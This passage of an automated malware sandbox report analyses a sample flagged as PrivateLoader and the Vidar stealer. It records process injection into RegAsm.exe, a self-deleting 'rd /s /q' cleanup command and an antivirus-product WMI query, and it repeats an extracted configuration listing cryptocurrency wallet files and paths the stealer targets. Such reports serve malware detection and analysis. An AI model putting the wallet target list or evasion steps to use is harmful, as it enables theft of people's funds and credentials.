                      Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: AE1008Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\BGDAAKJJDAAK" & exitJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CA24760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free,2_2_6CA24760
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C901C30 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLengthSid,malloc,CopySid,CopySid,GetTokenInformation,GetLengthSid,malloc,CopySid,CloseHandle,AllocateAndInitializeSid,GetLastError,PR_LogPrint,2_2_6C901C30
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00677D17 cpuid 0_2_00677D17
                      Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,0_2_006C4389
                      Source: C:\Users\user\Desktop\file.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,0_2_006D4E77
                      Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,0_2_006D51C0
                      Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,0_2_006D5242
                      Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,0_2_006D5303
                      Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_006D53B0
                      Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,0_2_006D5697
                      Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_006D580A
                      Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,0_2_006D5951
                      Source: C:\Users\user\Desktop\file.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_006D5A53
                      Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoEx,0_2_006769B1
                      Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoEx,FormatMessageA,0_2_0064F2B5
                      Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,0_2_006C363F
                      Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,0_2_006C382E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: _EH_prolog,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,2_2_0040FD2C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006C43D7 GetSystemTimeAsFileTime,0_2_006C43D7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040FC12 GetProcessHeap,HeapAlloc,GetUserNameA,2_2_0040FC12
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040FCD9 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,2_2_0040FCD9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C928390 NSS_GetVersion,2_2_6C928390
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: RegAsm.exe, 00000002.00000002.2171023727.0000000000F50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

                      Stealing of Sensitive Information

                      barindex
                      Yara detected PrivateLoader
                      Source: Yara matchFile source: C:\ProgramData\BGDAAKJJDAAK\vcruntime140.dll, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll, type: DROPPED
                      Yara detected Vidar
                      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                      Yara detected Vidar stealer
                      Source: Yara matchFile source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.file.exe.630000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1610588292.0000000000705000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: file.exe PID: 2520, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2832, type: MEMORYSTR
                      Found many strings related to Crypto-Wallets (likely being stolen)
                      Source: RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: RegAsm.exe, 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: window-state.json
                      Source: RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: RegAsm.exeString found in binary or memory: \Exodus\
                      Source: RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: RegAsm.exeString found in binary or memory: Exodus
                      Source: RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
